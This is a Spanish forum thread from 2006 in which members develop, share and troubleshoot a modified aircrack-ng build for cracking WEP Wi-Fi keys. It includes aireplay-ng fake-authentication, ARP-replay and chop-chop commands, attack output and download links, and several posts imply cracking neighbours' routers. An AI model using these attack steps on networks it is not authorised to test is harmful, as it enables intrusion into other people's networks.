Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: *dudux en 29 Septiembre 2006, 02:35 am
puedes descifrar un paquete sin llegar a tener la key,,,,,,,,, ;)


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: thefkboss en 29 Septiembre 2006, 11:43 am
bueno hasta cierto punto llevas razon es decir lo q hace es esto se supone q es para multiples canales, entonces para 5 canales haria.
wlan0 1, ath0 2, eth1 3
wlan0 2, ath0 3, eth1 4
wlan0 3, ath0 4, eth1 5

como ves en realidad no cambia solo el ultimo sino q digamos q se incrementa en una unidad por cada tarejta.

 con dos canales pasa eso prueba a poner 5 haber q pasa. te digo q pasa eso xq con 2 canales es logico q aumente la ultima xq no pueden aumentar a la vez es decir simpre tiene q haber una q sea menor o igual q el de canal mas grande por eso pasa eso pero si pones mas de 2 canales veras como esto no ocurre haz l prueba poniendo gran numero de canales y ya me diras como llevo razon.
este ataque esta pensado para monitorizar mas de 3o 4 canales al mismo tiempo pero tampoco os paseis soporta 8 tarjetas al mismo tiempo.

en cuanto a lo de la ipw3945 tienes los driver instalados habres el kismet y te la reconoce puedes descubir redes usando el KISMET????? PRUEBA ESO.

Pues en cuanto a lo del CHOP-CHOP se basa en un atake especial q se supone q hay una parte del pakete la q lleva las direcciones Ips q se puede descubrir mediante una comparacion con varios paquete lo q hace mas o menos el CHOP-CHOP es enviar una serie de paquetes de diversons tmaños y diversas funciones y cuando son devuletos los compara y descifra el paquete solo la parte de las IP sin saber la calve mediante la obtencion del Keystream.

la primera IP la 192.168.1.2 casi nunca coincide es decir puede ser 80.68.1.5 o vete tu a saber q depende de que este recibiendo pero la segunda 192.168.1.255 suele ser la ip de la maquina concetada a esa rez ( en este ejemplo estan cambiadas)


Título: Re: Aircrack-ng MotherFucker Edition version 0.4 ya disponible
Publicado por: thefkboss en 30 Septiembre 2006, 19:11 pm
bueno pues ya tengo terminada la version 0.5 todavía no he metido el atake de fragmentacion es mejor q el chop-chop xq su autor lo tiene q terminar y luego pasarmelo para q lo pruebe cuando me lo pase lo añadire pero supongo q sera en la siguinete.

bueno esta version lleva un parche el airodump-ng q lo q hace es q te diga el tipo de proteccion del router es decir

WEP/TKIP/WRAP/CCMP/WEP104 y el tipo de autentificacion OPN/PSK/MGT mediante una trama beacon

PD:lo estoy probando pero hasta mañana o el lunes no lo sako voy a probarlo a sako


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 noticias
Publicado por: rh3nt0n en 30 Septiembre 2006, 19:14 pm
mola , mola :)
no paras :)
saludos 


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 noticias
Publicado por: longits en 30 Septiembre 2006, 19:59 pm
que maravilla, tamos deseosos de probarlos, a ver q tal!

gracias y saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 noticias
Publicado por: thefkboss en 30 Septiembre 2006, 20:47 pm
bueno pues me equivoke no vasi a tener q esperar a la 0.6 ya tengo en mi poder el atake puro de fragmentacion q viene a ser lo mismo q el CHOP-CHOP q este no falla asi q lo metere mañana y ya lo tendreis


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 noticias
Publicado por: thefkboss en 1 Octubre 2006, 14:55 pm
bueno pues ya lo teneis

http://www.sendspace.com/file/t8vrfh

lo de wep y wap funciona cojonudamente ya no hace falta capturar un paquete para saber el tipo de contraseña ya no duda te lo pone directamente

en cuanto al atake de fragmentacion trae el programa tambien inculido se llama afrag pero no dire nada de como usarlo hasta q no lo pruebe mas xq me falla asi q tengo q hablar con su creador en breves para preguntarle un par de dudas


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 (ya disponible)
Publicado por: thefkboss en 1 Octubre 2006, 17:43 pm
jaja pues resultaq dentro de poco sakare la 0.6 en esta semana ya q han aparecido mas parches.ahora me he encotrado con una nueva tecnika de algunos routers de esos q llamamos JODIDOS la proteccion defecto o lo q sea se basa en
muchos AP (e.g. Linksys) envian 3 paquetes spanning BPDU cada segundo o asi.  Estos paquetes son WEP y por lo tanto contribuyen a los IV datos usados para el cracking.  Aqui es donde esta el truko.  Los 2 primeros bytes(antes de cifrar) no son 0xAA, son 0x42.
Asi q al hacer el metodo estadistico saltan los malditos falsos positivos

ya tengo los parches en mi poder asi q lo sakare en la poxima me acabo de fijar ya q hay un router cerka un linksys y es cierto el cabr.... suelta esos paquetes q cabr---


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 (ya disponible)
Publicado por: longits en 1 Octubre 2006, 18:28 pm
Ostras pos q maravilla, toy deseando de probarlo, pq tengo un router que es INVULNERABLE, 30 millones de IV's y nada...y mucho me temo q aunq pille mas no lo lograra, se trata de algun tipo de proteccion. Es un abocom.

Deseoso de pillar el de fragmentación, ya que el buffer ciclico no funciono.

Gracias, saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 (ya disponible)
Publicado por: Serch_Serch en 1 Octubre 2006, 18:39 pm
coño, me lo voy a bajar de la primera page y veo q tengo un monton de ediciones. La mejor o mas estable, es la ultima??


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 (ya disponible)
Publicado por: thefkboss en 1 Octubre 2006, 19:14 pm
no es q haya una mas estable q otra la mejor es la ultima ya q lleva todos los complementos.

longits en cuanto a ese tipo dedefecto proteccion o lo q sea q se supone q afecta a unos cuantos entre ellos el linksys saldra en la proxima version se un poco paciente porque me falta una parte de codigo para el aireplay y hasta q no la consiga no lo podre porbar.

Ahora no te garantico q funcione con todos loa routers o con el tuyo ese jodido.
xq  se supone q este parche q incorporara es para un tipo de paketes q llevan una direccion determinada si el abocomlleva esa proteccion incorporada PERO ME REFIERO EL MISMO TIPO TIENE Q SER LA MISMA EN CUANTO VARIE EL MAS MINIMO PARAMETRO YA NO SIRVE.

una pregunta te has fijado si ese router sin clientes conectados o cableados suelta algun tipo de paquetes cada x segundos.
tambien puede ser q sea WEP2.

tambien es una estupided pero hoy me he quedado lokisimo cuando he decubierto q  una red q aparecia con la version normal como WEP es en realidad WPA y es de verdad y encambio en el airodump aparecia como WEP por lo tanto   airodump guardaba los ivs como si fuese una contraseña WPA y x muchos q tuviese jamas la sakaria.jaja Esto no es q este confundido ni nada de nada.

Prueba esta version y me cuentas si te sigue saliendo como WEP o te pasa lo q ami.
EN ESTA VERSION NO HAY FALLOS ES DECIR NO DUDA SI ES WEP Y WAP YA Q LO HACE A PARTIR DE LOS FRAMES DE LOS BEACONS NO NECESITA CAPTURAR TRAFICO TE LO DICE DESDE Q CAPTA LA RED AUNQUE NO haya NI UN CLIENTE


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 (ya disponible)
Publicado por: Serch_Serch en 2 Octubre 2006, 19:41 pm
Me sale esto cuando intento bajarme la de win...

Forbidden
You don't have permission to access /leviatan/Download/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.3-win.zip on this server.


--------------------------------------------------------------------------------

Apache/1.3.34 Server at dreamers.com Port 80


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 (ya disponible)
Publicado por: longits en 2 Octubre 2006, 20:01 pm
Hola! bueno thefkboss todo será probarlo, de todos modos me suena muy bien el ataque de defragmentación, a ver si tengo algo de suerte y funnciona.

Si tiene clientes conectados y bastante legítimos creo, de hecho la reinyeccion es que es perfecta, tanto con el A3 como con el A1+A3.

Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 (ya disponible)
Publicado por: thefkboss en 2 Octubre 2006, 21:26 pm
el ataque de fragmentacion sirve para conseguir el rpga y a partir de ahi forjar un pakete arp udp.....
a mi me falla y a rh3nt0n tambien pero seguimos probando el porque ya os contare


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 (ya disponible)
Publicado por: o2T7f6j2 en 3 Octubre 2006, 03:01 am
Me sale esto cuando intento bajarme la de win...

Forbidden
You don't have permission to access /leviatan/Download/aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.3-win.zip on this server.


--------------------------------------------------------------------------------

Apache/1.3.34 Server at dreamers.com Port 80

¿Cuál es el enlace?

thefkboss, enhorabuena, aaún no probé la opción de especificar el tamaño de ciclo del búfer, pero creo que es más probable que se trate de esos tres paquetes provocadores del falso positivo.

Salu2


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 (ya disponible)
Publicado por: .NiXoN. en 3 Octubre 2006, 09:53 am
Wenas !!

Enhorabuena !! No paras !!! ESta tarde lo bajo (que aora no puedo xDDDD). Haber si haces que la ipw3945 se pongan en modo monitor....

Jajajaja xk me fije que en la carpeta "patches" no estaba la ipw3945 y x eso no se ponia en modo monitor....

Saludos !!!

P.D: ala tarde lo pruebo y os comento xDD


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 (ya disponible)
Publicado por: thefkboss en 3 Octubre 2006, 14:01 pm
.NiXoN. q va el parche esta aplicado al airmon-ng no tiene q estar en la carpeta patches ahi solo se encuentran los de inyectar y como con esa no se puede pues no hay nada.

para q funcione en modo monitor tiene q ver mas con el kismet ya q hace uso de una de sus librerias por eso estoy pensando q a lo mejor el problema te viene de hay tienes el ultimo kismet instalado si no es asi bajatelo instalalo y luego ejecuta el aimon-ng de todas formas para la proxima version le he añadido un par de cosas mas.

por cierto para saber si tu fallo radica en eso q te he comentado pues haz una cosa bajate el aircrack-ng 0.62 q acaba de salir y prueblao este al igual q el mio lleva el parche si no se te pone en modo monitor con el aircrack original es debido al kismet asi salimos de dudas.


Citar
¿Cuál es el enlace?
no se si habra algo estropeado en ese enlace preguntarselo a Armenos q el server es suyo

Citar
thefkboss, enhorabuena, aaún no probé la opción de especificar el tamaño de ciclo del búfer, pero creo que es más probable que se trate de esos tres paquetes provocadores del falso positivo.
pues esta semana saldremos de dudas xq ya tengo preparada la 0.6 con el parche de los malditos pquetes


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 (ya disponible)
Publicado por: thefkboss en 3 Octubre 2006, 14:06 pm
bueno pues ya tengo la 0.6 casi terminada ahora se muestra en pantalla el tipo de proteccion es decir ademas de wpa lo del tkp.....
tambien he metido lo del parche de los 3 paquetes eso q hacen falso positivo no digo q esto valla a solucionar el problema a lo mejor si pero no lo sabre hasta q la gente lo pruebe solo es q esta metido si es debido a estos paquetes el problemas se solucionara definitivamente si no es asi pues mala suerte
voy haber si le meto tambien la distincion entre WEP y WEP2 supongo q el viernes lo sacare a subasta


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: Serch_Serch en 3 Octubre 2006, 15:46 pm
Intento bajarme la version para win con otro equipo (aircrack-ng-0.6_MOTHERFUCKER_EDITION_0.3 para windows), y me dice lo mismo... q no


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: thefkboss en 3 Octubre 2006, 15:58 pm
a ya me acuerdo lo q pasa era un fallo del server de Armenos q tenias q hacer boton derecho guardar como


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: .NiXoN. en 3 Octubre 2006, 16:53 pm
Wenas !!!
Citar
.NiXoN. q va el parche esta aplicado al airmon-ng no tiene q estar en la carpeta patches ahi solo se encuentran los de inyectar y como con esa no se puede pues no hay nada.

Es verdad !! fallo mio....lo SIENTO.

Citar
para q funcione en modo monitor tiene q ver mas con el kismet ya q hace uso de una de sus librerias por eso estoy pensando q a lo mejor el problema te viene de hay tienes el ultimo kismet instalado

Ok, primeor lo provare cn el kismet que lo enog instalado.....como lo ejecuto? jajaja

Citar
kismet -c eth0, eth0, eth0

Esta supongo que no no? Xk al no haber en iwconfig ni en ifconfig el eth0 no lo cojera...

Donde tb puedo ejecutar es en inicio (ajja eso no es windows? jja) y ejecuto el kismet, y me dice con que tarjeta....voy a probar poniendo "etho" (ya que x defecto sale: madwifi-ng)

Citar
y luego ejecuta el aimon-ng

Ok ejecutare 1º el ksiemt y luego cuadno este corriendo el kismet ejecutare el airmon-ng haber si sale !!

Citar
bajate el aircrack-ng 0.62

Downloading.....xDDDDDD

Weno compañeros !! a la tarde-noche os cuento !!!

Saludos !!!


Título: Re: Aircrack-ng MotherFucker Edition version 0.5 (ya disponible)
Publicado por: o2T7f6j2 en 3 Octubre 2006, 23:07 pm
no se si habra algo estropeado en ese enlace preguntarselo a Armenos q el server es suyo

Ok, quería el enlace para averiguar quién era el dueño :D Es sólo por preguntarle una curiosidad. TY

Salu2


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: Armenos en 4 Octubre 2006, 08:38 am
a ya me acuerdo lo q pasa era un fallo del server de Armenos q tenias q hacer boton derecho guardar como

Tengo que descubrir como solvertarlo, y no únicamente cambiando la extensión jejeje Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: .NiXoN. en 4 Octubre 2006, 14:53 pm
WEnas !!

WEno.....traigo novedades.....

Haber......mi ipw3945 cuando inicio el sistema NO la reconoce...

Cuando instalo el motherfucker vuestro jeje me la detecta !! pero como tarjeta Etheret !! me explico??

Otra cosilla.......(cambiando de tema) para inyectar la 2200 ha hecho falta modificar los drivers??

Saludos !!

EDIT

Provare con la nueva version del puppy haber si detecta la ipw3945....xDDD


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: thefkboss en 4 Octubre 2006, 15:24 pm
vamos a ver q te diga q es eth0 o eth1 o lo q sea no signifika q te la reconozca como ethernet si no q le da ese apodo nada mas es como yo q se las atheros ath las prims wlan las ratlink ras....
En cuanto a las 2200 si q hace falata modificar los drivers tienes q bajarte los originales y parchearlos con el pacht q encontararas en las carpeta pacth del aircrack.

luego si eso sigue la guia de instalacion q hay al respecto


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: .NiXoN. en 4 Octubre 2006, 15:34 pm
Wenas !!

Citar
vamos a ver q te diga q es eth0 o eth1 o lo q sea no signifika q te la reconozca como ethernet si no q le da ese apodo nada mas es como yo q se las atheros ath las prims wlan las ratlink ras....

Tranquilo compañero.....tranquilo.....

Haber.......kizas aya sido mi culpa por no especificarme....:

Me la detecta como Ethernet xk cuando pongo:

Citar
ifconfig eth0 modo Monitor

Me dice que no se puede poner en modo monitor xk es Ethernet.

Tambien se que es Ethernet xk cuando ejecuto el kismet no me sale......

etc..etc..etc....



Respeto a lo de la 2200 era para info. xk igual que modiicaron la 2200 para inyectar...xk no modificar los drivers de la 3945 para inyectar? Todo es posible en esta vida....

Weno voy al puppy haber que me cuenta sobre la 3945...

Saludos !!!


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: thefkboss en 4 Octubre 2006, 15:43 pm
jaja lo de vamos a ver es mi forma de hablar.jaja no es q pierda los nervios es una expersion q utilizo mucho asi q si te digo esto no te creas q me he enfadado o algo asi.
vale esta explicacion q me has dado me convenze la entiendo.jaja.
pues no se xq te dice eso has probado con la version del aircrack-ng 0.62 q acaba de salir te dice lo mismo o con esa te deja.

pon esto:

Código:
airmon-ng start eth0 1

1= es el canal pon el q quieras

q te dice al ejecutar ese comando.

supongo q se podran modifica pero la verdad no lo se xq x ejemplo de los drivers de una ath0 a una ratlink hay diferencia hombre supongo q siendo de la misma marka no habra mucha en cuanto a los comando pero la verdad es q no lo he mirado


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: rh3nt0n en 4 Octubre 2006, 18:52 pm
thefkboss , el parche para airmon-ng y ipw3945 en modo monitor , funciona perfectamente ;)

 
(http://www.bluntmen.com/ipw3945monitor.jpg)

eres un mostro tio .. no tienes otro calificativo .. :)

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: thefkboss en 4 Octubre 2006, 20:30 pm
hombre es facil con leer un poco saber ingles y saber donde va cada parte del codigo se hace.

ESTA TIRADO.JAJA


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: .NiXoN. en 4 Octubre 2006, 20:35 pm
Wenas !!

Citar
airmon-ng start eth0 1

1= es el canal pon el q quieras

q te dice al ejecutar ese comando.

Luego lo pruebo en Back|TRack  ;)



Perdon x malinterpretarte mal, lo siento  :-\

Saludos !!

EDIT

Voy a probar una  eso que as dicho thefkboss

 


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: thefkboss en 4 Octubre 2006, 20:52 pm
na no pasa nada hay veces q x mas q nos ponemos no damos con lo q hacemos mal.
no pasa nada para eso esta este foro para comparti nuestros conocimeintos


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: feddie en 5 Octubre 2006, 02:46 am
Compañeros al usar este programa y otro con mi ipw2200 me sale el siguiente mensaje:

Código:
Wrong radiotap header version

tambien me sale al ejecutar, la suite de aircrack original.

Ademas no puedo inyectar correctamente con mi prism-gt, me dice que me mandan un paquete de desautentificacion y no suben los datas ni los arp a una buena velocidad. Suben a menos de 1/s.

SAlu2


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: rh3nt0n en 5 Octubre 2006, 11:30 am
Compañeros al usar este programa y otro con mi ipw2200 me sale el siguiente mensaje:

Código:
Wrong radiotap header version

podias poner los comandos que utilizas ?

tambien me sale al ejecutar, la suite de aircrack original.

Ademas no puedo inyectar correctamente con mi prism-gt, me dice que me mandan un paquete de desautentificacion y no suben los datas ni los arp a una buena velocidad. Suben a menos de 1/s.

SAlu2


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: .NiXoN. en 5 Octubre 2006, 12:24 pm
WEnas !!

Citar
Wrong radiotap header version

podias poner los comandos que utilizas ?

Si! es cierto !!

Yo ponia:

Citar
airodump eth0 torre 11 1

Pero cahi en la conclusion que salia xk el nombre ya existia, xk en cambio, ponia:

Citar
airodump eth0 holaaaa 11 1

Y si que iba xDDD

Prueba  aponer otro nombre feddie !!

Saludos !!


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (noticias)
Publicado por: thefkboss en 5 Octubre 2006, 15:44 pm
bueno ya teneis la 0.6 terminada espero q os guste y la probeis lleva el parche para esso 3 jodidos paquetes de algunos routers no se si funcionara con todos pero eso es facil de probar lo unico q teneis q hacer es pasar el archivo de captura q hallais capturado es decir el q teneis no cuantos millones x el aircrack-ng ya q tambien lleva el parche y si os dice la clave es q funciona ya q los paquetes estos los descarta directamente


http://www.sendspace.com/file/bz4uj5


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: feddie en 5 Octubre 2006, 20:50 pm
Ya encontre la solucion creo que era por poner ese comando de:
Código:
associate=0
algo asi dentro del archivo de la tarjeta.

Salu2

PD. Pueden poner una lista completa con los pasos a seguir para inyectar de la manera mas efectiva con la ipw ya q he tratado con los q vienen en el manual y no me funciona muy bien que digamos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: rh3nt0n en 5 Octubre 2006, 21:12 pm
Ya encontre la solucion creo que era por poner ese comando de:
Código:
associate=0
algo asi dentro del archivo de la tarjeta.

si te fijas y recuerdas lo que lees , esa opcion era  para que la ipw2200 no se autoasociara al arrancar el pc , despues Fok , que es quien busco esa informacion y la dio , aclaro que esa opcion no dejaba que la ipw2200 se asociara despues de arrancar , y como podras comprobar en el manual ,yo aconsejo solo modicar el archivo que comentas solo con rtap_iface=1 .


Salu2

PD. Pueden poner una lista completa con los pasos a seguir para inyectar de la manera mas efectiva con la ipw ya q he tratado con los q vienen en el manual y no me funciona muy bien que digamos.

la mejor ayuda que puedes obtener la tendras en la ayuda de los comandos , asi aprenderas a interpretarlos y como funcionan ..
por ejemplo:

Citar
airodump-ng (sin opciones)


te devolvera la ayuda con las opciones de el comando ,asi como su sintaxis
.

esta ayuda la obtendras de esta manera con todas las aplicaciones de la suite aircrack-ng .







Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: Serch_Serch en 6 Octubre 2006, 20:11 pm
A ver si termina la descarga del BackTrack... Pero yo ya pregunto.

Lo del ataque ciclico, para tener mas arp o datas... hay q poner alguna orden en especial o lo hace ya de forma automatica al poner:

1.- airodump-ng ath0 pruebas 6 1 (x ejemplo)

(si no hay clientes)
2.- aireplay-ng -1 30 ath0 -e ESSID -a BSSID -h 00:11:22:33:44:55
(si hay cliente o el ataque 1 ha sido exitoso)
3.- aireplay-ng -3 ath0 -b BSSID -h STATION -x 300

4.- aircarck-ng pruebas.ivs

Me equivoco??


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: thefkboss en 6 Octubre 2006, 20:23 pm
pues si la opcion es -g

es decir te quedaria

aireplay-ng -3 ath0 -b BSSID -h STATION -x 1000 -g 1000000


aumenta -x a 1000
y la -g es 1000000 eso significa q coga 1000000 de ARP distintos esto l puedes variar yo siempre opto por este numero xq asi simpre sabras q ya hay 1000000 de IVS distintos (SIEMPRE Y CUANDO LLEGE HASTA EL FINAL es decir cuando veas read packetes you have 1....arp send ....)


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: Serch_Serch en 6 Octubre 2006, 20:25 pm
OK. Tengo 1 fichero capturado con varios ARP y con 500.000 IV's.

Se puede hacer algo?? Mas rapido?? O tengo q empezar de 0??


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: *dudux en 6 Octubre 2006, 21:58 pm
que cabezon!!!!!!!! ;D ;D ;D

necesitaras siempre un cliente!!!!!!!!!!! sea falso o no........

si el A1 no te funciona,,,que haremos???

salir por patas??? jajajaja


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: feddie en 7 Octubre 2006, 04:49 am
Oigan y alguien sabe por que me sale el siguiente mensaje:

Código:
ferbo@FeRbOs-LaP:~$ sudo aireplay -1 30 -x 1000 -e xxxxxx -a MACBSSID -h MACTARJETA eth2
19:58:40  Sending Authentication Request
19:58:42  Sending Authentication Request
19:58:44  Sending Authentication Request
19:58:46  Sending Authentication Request
19:58:48  Sending Authentication Request
19:58:50  Sending Authentication Request
19:58:50  Authentication successful
19:58:50  Sending Association Request
19:58:50  Association successful :-)
[b][glow=red,2,300]19:59:00  Got a deauthentication packet![/glow][/b]
19:59:03  Sending Authentication Request
19:59:05  Sending Authentication Request
19:59:05  Authentication successful
19:59:05  Sending Association Request
19:59:10  Sending Authentication Request
19:59:12  Sending Authentication Request
19:59:14  Sending Authentication Request

Attack was unsuccessful. Possible reasons:

    * Perhaps MAC address filtering is enabled.
    * Check that the BSSID (-a option) is correct.
    * The driver hasn't been patched for injection.
    * This attack sometimes fails against some APs.
    * The card is not on the same channel as the AP.
    * Injection is not supported AT ALL on HermesI,
      Centrino, ndiswrapper and a few others chipsets.
    * You're too far from the AP. Get closer, or lower
      the transmit rate (iwconfig <iface> rate 1M).
creo que no me deja hacer el ataque 1 por ese dichoso paquete de desauntentficacion que me manda. Ademas para usar el ataque 4 y conseguir un paquete xor e inyectarlo mediante el ataque 2 es necesario que haya un cliente conectado, o me equivoco????

PD. Saben si se puede inyectar en windows con ipw2000 o prismgt????

Salu2


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: *dudux en 7 Octubre 2006, 09:31 am
en windows con la ipw2200 NO se puede reinyectar ..........

para el A4 necesitas A1,,,,,,,,,,

ese paquete es normal........te falla por la distancia,,,bajale el rate ,prueba otra distancia,,,prueba otro dia,,prueba otra MAC de cliente,,,etc,etc

a veces no sale :-\


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: thefkboss en 7 Octubre 2006, 14:25 pm
en realidad *dudux te equivocas un poco para el A4 no necesitas el A1 necsitas un cliente legitimo no vale q te asocies y  te hagas el chop-chop a ti mismo ya q solo estas asociado y no trasmites nada


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: Serch_Serch en 7 Octubre 2006, 22:41 pm
Bueno, ya tengo la live de BackTrack_final_1.0.

Tengo q copiar el fichero en un sitio determinado?? Como se descomprime?? He leido q es diferente si es tar o zip... Al final es make??

Gracias


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: *dudux en 8 Octubre 2006, 03:47 am
en realidad *dudux te equivocas un poco para el A4 no necesitas el A1 necsitas un cliente legitimo no vale q te asocies y  te hagas el chop-chop a ti mismo ya q solo estas asociado y no trasmites nada

tienes razon.. ;).escribi demasiado deprisa,,,,,,,,,
tampoco queria decir eso....no interpetre en pocas palabras
:-X


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: thefkboss en 8 Octubre 2006, 13:27 pm
*dudux tranqui q no interpreto nada si ya se q son las prisas.
es q hay una ataque el de fragmentacion q es como el CHOP-CHOP se basa en sacar el KEYSTREAM y ese si q te lo puedes hacer a ti mismo pero de momento solo funciona con las 2570usb.

para  Serch_Serch descomprimes lo puedes hacer con el modo grafico q es mas facil si no sabeses tipo el modo grafico winzip sino pues

Código:
tar -zxvf aircrack-ng-0.6-motherfucker_06.tar.gz

Código:
 make clean && make && make install


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: Serch_Serch en 8 Octubre 2006, 22:28 pm
Vale, lo tengo q meter en algun sitio en especial o no??


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: thefkboss en 9 Octubre 2006, 13:22 pm
no donde tu quieras


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: pianista en 11 Octubre 2006, 15:20 pm
Weno thefkboss a lo mejor me matas, pero la verdad es que no pude probar el motherfucker hasta ahora por problemas entre linux y yo, pero vamos todo solucionado y quiero que sepas que te ha quedado de 10 ;D
Saludosss y gracias


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: thefkboss en 11 Octubre 2006, 19:37 pm
no pasa nada pianista te tengo en la lista negra(coña)jajajaj ;D te mola me alegro esta semana seguramente mañana saque la 0.7 q te va a molar mas.jajaja


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: rh3nt0n en 11 Octubre 2006, 20:15 pm
Citar
esta semana seguramente mañana saque la 0.7 q te va a molar mas.jajaja

ya tardabas ...  ;D ;D ;D

que lleva de nuevo ?

saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: Serch_Serch en 11 Octubre 2006, 21:41 pm
Venga... un adelanto...


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: thefkboss en 11 Octubre 2006, 21:55 pm
vale vale un adelanato digamos q ahora lleva como un tanto porciento q cuenta los beacons los paquetes enviados los perdidos los de las sation traducido un indicador de la cualidad de las señal es q ahora con la ***** del modulo no vuelvo a casa hasta las 3 asi q solo me da tiempo a montar las versiones por las tarde ya la tengo montada y como mañana es fiesta nacional pues por la mañana la pruebo la retoco la subo si todo funciona y por la tarde me piro de fiesta,.jajajaj

OS GUSTARA joder cada dia lleva mas codigo.jajaja


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: rh3nt0n en 11 Octubre 2006, 22:11 pm
mola , ya hay ganas de probarla   :P



Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: longits en 11 Octubre 2006, 22:18 pm
Joer que maravilla tio...como te lo tas currando. A ver si terminan cayendo todos los routers jodidos.

Por cierto, cambiaste las lineas del aireplay para eternizar el ataque -1 aunque haya perdida de señal?

Saludos.


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: pianista en 12 Octubre 2006, 02:14 am
Jejeje la espero ansioso... ;D ;D ;D
Saludossss


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: feddie en 12 Octubre 2006, 06:32 am
Joer que maravilla tio...como te lo tas currando. A ver si terminan cayendo todos los routers jodidos.

Por cierto, cambiaste las lineas del aireplay para eternizar el ataque -1 aunque haya perdida de señal?

Saludos.

Ojala y se pueda ya que yo tengo poca señal de mi ap y tengo q estar poniendo el ataque -1 miles de veces para ver cuando agarra arp y empieza a inyectar. Seria lo mejor q me pudiera pasar

Salu2


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: rh3nt0n en 12 Octubre 2006, 09:23 am
Joer que maravilla tio...como te lo tas currando. A ver si terminan cayendo todos los routers jodidos.

Por cierto, cambiaste las lineas del aireplay para eternizar el ataque -1 aunque haya perdida de señal?

Saludos.

Ojala y se pueda ya que yo tengo poca señal de mi ap y tengo q estar poniendo el ataque -1 miles de veces para ver cuando agarra arp y empieza a inyectar. Seria lo mejor q me pudiera pasar

Salu2

si usas la ipw2200 , el atake 1 no te sirve , me baso en los datos de tu firma , si usas la D-link .. ok .


Título: Re: Aircrack-ng MotherFucker Edition version 0.6 (ya disponible)
Publicado por: thefkboss en 12 Octubre 2006, 14:03 pm
bueno ya lo teneis disponible.
se ha cambiado el contador de beacons por beacons por segundo y ademas mide la potencia de las Station.

http://www.bluntmen.com/aircrack-ng-0.6_motherfucker_edition_07.tar.gz

espero q os guste


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: longits en 12 Octubre 2006, 15:16 pm
Este cual es, el 0.7 thefkboss? La verdad es que es una maravilla el ultimo, lo estuve probando con un linksys que se me resisitia y finalmente cayó, 4.500.000 pero perfect.

El abocom, imposible, yo creo que es inquebrantable, es que suelta los bits que le da la gana

Saludos


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
Publicado por: Serch_Serch en 12 Octubre 2006, 15:38 pm
Seguro q ya está pensando lo q va a cambiar/añadir para su proxima version jejej

Es un monstruo este tio


Título: Re: Aircrack-ng MotherFucker Edition version 0.7 (ya disponible)
